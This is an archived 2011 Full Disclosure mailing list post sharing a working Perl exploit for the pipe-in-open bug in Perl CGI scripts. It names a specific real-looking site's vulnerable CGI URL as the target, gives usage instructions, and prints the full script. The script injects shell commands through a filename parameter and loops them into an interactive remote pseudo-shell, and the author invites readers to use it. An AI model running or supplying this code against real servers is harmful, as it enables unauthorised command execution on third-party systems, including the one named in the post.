Full Disclosure mailing list archives
Re: perl pipe exploit (drops you at a shell)
From: Marshall Whittaker <marshallwhittaker () gmail com>
Date: Sat, 15 Oct 2011 19:01:50 -0300
Well shit. It did send twice. :( Now I look like a goof, haha. On Sat, Oct 15, 2011 at 6:58 PM, Marshall Whittaker < marshallwhittaker () gmail com> wrote:
This works off the perl pipe read bug, you can just input the first and second parts of the web address (with http:// included) and it'll drop you at a shell. When using cd you must use the absolute path because I was too lazy to do it the correct way. ;-). I know this is pretty easy stuff, it works off those vulns that can just be exploited with a web browser, but this gives you a shell. So have at it guys & gals! Had to resend because I got some message about my attachment being blocked. Not sure if it really was, though, I'll send again anyway. Hope this isn't spamming the list. =/ Site: http://ultimategto.com/cgi-bin/statsedittext.cgi?filename=stats/1966vinmatrix.htm&desc=Stat+File Useage: ./sublime.pl " http://ultimategto.com/cgi-bin/statsedittext.cgi?filename=" "&desc=Stat+File" Should work on most perl cgi scripts that are vulnerable to | read bug. Please note, it's not a "real" shell, but almost everything works, except things that won't go in one instance like cd-ing and env vars, etc. Play nice! --oxagast [CODE] #!/usr/bin/perl # adaptive cgi shell by oxagast use LWP::Simple; $part1 = @ARGV[0]; $part2 = @ARGV[1]; print "Making buffer...\n"; for $bet (100..200) { $bettwo = $bettwo . "AAAA" . $bet . "AAAA\\\\n"; } print "Exploiting...\n"; $id = get("$part1\|id\|$part2"); $id =~ m/(uid=\d+\(.*\) gid=\d+\(.*\) groups=\d+\(.*\))/; print "Well shizzle my nizzle... shell by oxagast... use wisely \;\)\n\n"; $uid = $1; print "$uid\n"; while (0 == 0) { print "\$ "; $cmd = <STDIN>; chomp($cmd); if ($cmd =~ m/cd (\/.*)/) { $dir = $1; } if ($cmd eq "cd ..") { $dir =~ s/(.*)\/.*/\/\1/; } if ($cmd eq "pwd") { $dirjunk = $dir; if ($dirjunk eq "//") { $dirjunk = "/"; } } $dirjunk = "cd $dir\;$cmd"; $cmdhex = unpack("H*","$dirjunk &>/tmp/cmdlnerr"); $cmdhex =~ s/(..)/\\\\x$1/g; get("$part1\|echo -e $bettwo > /tmp/buff\|$part2"); $backjunk2 = get("$part1\|cat /tmp/buff\|$part2"); @backjunk = split("\n", $backjunk2); get("$part1\|echo -e \"$cmdhex\" > /tmp/cmdln\|$part2"); get("$part1\|/bin/sh /tmp/cmdln > /tmp/cmdlerr\|$part2"); $backjunk_as = get("$part1\|cat /tmp/cmdlnerr\|$part2"); @backjunk_split = split("\n", $backjunk_as); $backjunk_wcl = get("$part1\|wc -l /tmp/cmdlnerr\|$part2"); $backjunk_wcl =~ m/(\d+) \/tmp\/cmdlnerr/m; $thismanylines = $1 - 1; for $junknum (0..scalar(@backjunk_split)) { for $fuzz (10..100+$thismanylines) { if ($backjunk[$junknum] =~ m/(AAAA\Q$fuzz\EAAAA)/) { $middle = $1; @backjunk[$junknum] =~ m/(.*)\Q$middle\E/; @backjunk_split[$junknum] =~ s/$1//; @backjunk[$junknum] =~ m/\Q$middle\E(.*)/; @backjunk_split[$junknum] =~ s/$1//; print "$backjunk_split[$junknum]\n"; } } } } [/CODE]
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- perl pipe exploit (drops you at a shell) Marshall Whittaker (Oct 15)
- Re: perl pipe exploit (drops you at a shell) Marshall Whittaker (Oct 15)
- Re: perl pipe exploit (drops you at a shell) xD 0x41 (Oct 15)
- Message not available
- Re: perl pipe exploit (drops you at a shell) xD 0x41 (Oct 15)
- Message not available
- Re: perl pipe exploit (drops you at a shell) xD 0x41 (Oct 15)
- Re: perl pipe exploit (drops you at a shell) xD 0x41 (Oct 15)
- Message not available
- Re: perl pipe exploit (drops you at a shell) xD 0x41 (Oct 15)
- Message not available
- Re: perl pipe exploit (drops you at a shell) xD 0x41 (Oct 16)
- Message not available
- Re: perl pipe exploit (drops you at a shell) Valdis . Kletnieks (Oct 16)
- Re: perl pipe exploit (drops you at a shell) Marshall Whittaker (Oct 15)